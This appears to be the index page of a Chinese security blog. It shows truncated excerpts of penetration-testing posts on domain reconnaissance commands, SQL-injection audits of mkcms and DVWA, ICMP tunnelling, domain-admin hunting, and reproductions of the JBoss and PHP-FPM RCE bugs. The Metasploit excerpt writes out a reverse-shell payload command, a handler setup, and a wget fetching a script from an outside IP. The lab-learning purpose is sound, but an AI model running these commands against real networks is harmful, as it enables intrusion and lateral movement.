域内信息收集
0x01 本机信息收集查看当前工作组 net view查询网络配置 ifconfig /all本机用户列表 net user管理员用户列表 net localgroup administrators 查看当前在线用户 query user || qwinsta 查询进程 tasklist /v wmic process list brief 查询端口列表 netstat -ano 查询系统补丁信息等 systeminfo 查询补丁列表 wmic qfe get caption,description,HotFixID,installed0n查询本机共享 net share net share hostname(主机名) wmic share get name,path,status IPC$连接 net use \\ip\ipc$ "密码" /user:账号 net use Z: \\ip\c$ 映射网络主机C盘到本机 查询用户权限 whoami
收集操作系统及安装软件版本信息获取操作系统和版本信息systeminfo | findstr /B /C:"OS 名称(name)" ...
mkcms注入审计学习
0x00 目标本次学习目标为找出mkcms的sql注入漏洞
0x01 CMS目录说明核心目录admin 管理员目录data 页面显示模板editor kindeditor编辑器上传目录install 安装目录system 配置信息,数据库连接文件等ucenter 用户目录
0x02 审计工具使用对于新手来说,当然是先各种审计工具一把梭,用法师的审计工具对mkcms自动审计一波,扫出了不少漏洞。
0x03 后台管理员修改处SQL注入漏洞主题是挖sql注入,自然是先怼注入,第一个是后台管理员修改处
//为了简洁,我删除了部分代码,留下漏洞代码,此漏洞存在admin/cms_admin_edit.php $result = mysql_query('select * from mkcms_manager where m_id = '.$_GET['id'].''); if($row = mysql_fetch_array($result)){//此处代码未做过滤,直接拼接(当时没有看安全函数,直接就刚了)
代码是这样的
直接抓包做测试,使用审计工具中的mysql数据库监 ...
dvwa审计学习
0x00 环境[TOC]
php环境:5.4.45
mysql环境:5.6.35
dvwa版本:官网最新
0x01 SQL注入漏洞Low级别漏洞代码if( isset( $_REQUEST[ 'Submit' ] ) ) {//判断request中的submit是否已设置 // Get input $id = $_REQUEST[ 'id' ];//获取id的值 // Check database //此处为拼接sql语句 $query = "SELECT first_name, last_name FROM users WHERE user_id = '$id';"; //执行成功后将结果赋给变量,执行出错则终止代码,并抛出错误 $result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : ...
Hello World
Welcome to Hexo! This is your very first post. Check documentation for more info. If you get any problems when using Hexo, you can find the answer in troubleshooting or you can ask me on GitHub.
Quick StartCreate a new post$ hexo new "My New Post"
More info: Writing
Run server$ hexo server
Generate static files$ hexo generate
More info: Generating
Deploy to remote sites$ hexo deploy
More info: Deployment
隐藏通信隧道技术
0x00 内网连通性判定判断内网哪一层协议连通,使用对应隧道技术穿透。
1、网络层隧道
IPv6隧道
ICMP隧道
PS:判定连通工具,ping ip
2、传输层隧道
TCP
UDP
PS:判定连通工具,nc ip port
3、应用层隧道
SSH
HTTP
PS:判定连通工具,Curl ip:port
HTTPS
DNS
PS:判定连通工具
nslookup 网址 [ip]
dig [@ip] 网址
0x01 网络层隧道ICMPSH工具安装
下载链接:git clone https://github.com/inquisb/icmpsh.gitapt-get install python-impacketsysctl -w net.ipv4.icmp_echo_ignore_all=1
环境
攻击机:kali 192.168.0.118防火墙:monowall 192.168.0.116(外网) 192.168.1.1(内网)受控机:windows7 192.168.1.4攻击机运行命令./icmp_m.py 1 ...
域管理员定位工具
0x00 Psloggedon1、psloggedon
在 Windows 中,可以使用命令“net session”查看谁在本地计算机上使用了资源,但是没有命 令用来查看谁在使用远程计算机的资源、谁登录了本地或远程计算机。psloggedon.exe 可以显示本地登录的用户和通过本地计算机或远程计算机的资源登录的用户指定了用户名而不是计算机,psloggedon.exe 会搜索网络邻居中的计算机,并显示该用户当前是否已登录,其原理是通过检 验注册表里 HKEY_USERS 项的 key 值来查询谁登录过机器(同样调用了 NetSessionEnum API), 某些功能需要拥有管理员权限才能使用。
psloggedon [-] [-l] [-x] [\\computername|username]-:显示支持的选项和用于输出值的单位。-l:仅显示本地登录,不显示本地和网络资源登录。-x:不显示登录时间。\\computername:指定要列出登录信息的计算机的名称。Username:指定用户名,在网络中搜索该用户登录的计算机。
指定要列出登录信息的计算机 ...
msf内网渗透
0x01 生成shellcode攻击机:linux系统
目标机:linux系统
生成linux反弹shellcode
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=4444 -f elf -o shell
接收反弹shell
选择模块use exploit/multi/handler设置set payload cmd/unix/reverse_bashset lhost 192.168.1.1set lport 4444set ExirOnSession flaseexploit
搭建小型web服务器
python -m SimpleHTTPServer 8080
wget http://47.244.13.36:8080/ip3.py
内网环境搭建
0x00 网络拓扑本次需搭建六台服务器,两台kali,三台windows,一台防火墙,环境大致拓扑图如下。
域控:windows 2012 R2
成员:windows7
边界:kali-双网卡
防火墙:monowall-双网卡
外网:kali、windows7
内网段:192.168.1.0/24
外网段:192.168.43.0/24
网卡配置:
外网配置桥接,外网无法访问内网。
内网配置仅主机,仅主机需访问外网段及互联网(仅主机网卡设置为无线网卡)。
0x01 环境搭建搭建防火墙 第一次进入界面,选择选项7安装,重启后断开ISO文件
安装成功,界面如上图所示。
选项说明:
1、选择网卡接口
2、设置网卡的ip
3、重置防火墙密码
4、删除所有配置,初始化防火墙
5、重启
6、ping ...
jboss反序列化漏洞复现-CVE-2017-12149
0x00 环境搭建攻击机:192.168.1.102(kali)
目标机:192.168.1.101(ubuntu)
使用ubuntu搭建漏洞环境
JBOSS 下载地址:http://download.jboss.org/jbossas/6.1/jboss-as-distribution-6.1.0.Final.zip
配置java环境
删除java环境配置信息(1) apt-get update(2) apt-cache search java | awk '{print($1)}' | grep -E -e '^(ia32-)?(sun|oracle)-java' -e '^openjdk-' -e '^icedtea' -e '^(default|gcj)-j(re|dk)' -e '^gcj-(.*)-j(re|dk)' -e 'java-common' | xargs sudo apt-get -y remove(3) apt-get -y autoremove2、清除配置信息: dpkg -l | grep ^rc | awk '{print($2)}' | xa ...
PHP-FPM远程代码执行漏洞
0x00 前言漏洞源自前段时间的Real World CTF比赛,当Nginx使用特定的配置时,存在远程代码执行。
Nginx配置文件中fastcgi_split_path_info字段配置为^(.+?\.php)(/.*)$;时,攻击者通过构造的payload,造成远程代码执行漏洞,虽然不是默认配置,但此配置已被广泛运用,危害还是挺大的。。
影响版本:Nginx+php-fpm,服务器有如下配置,则存在此漏洞
location ~ [^/]\.php(/|$) {fastcgi_split_path_info ^(.+?\.php)(/.*)$; fastcgi_param PATH_INFO $fastcgi_path_info; fastcgi_pass php:9000; ...}
0x01 环境搭建下载漏洞环境:git clone https://github.com/vulhub/vulhub.git 切换到nginx漏洞目录cd vulhub/php/CVE-2019-111043启动环境:docker-compose up -dpoc下载地址:g ...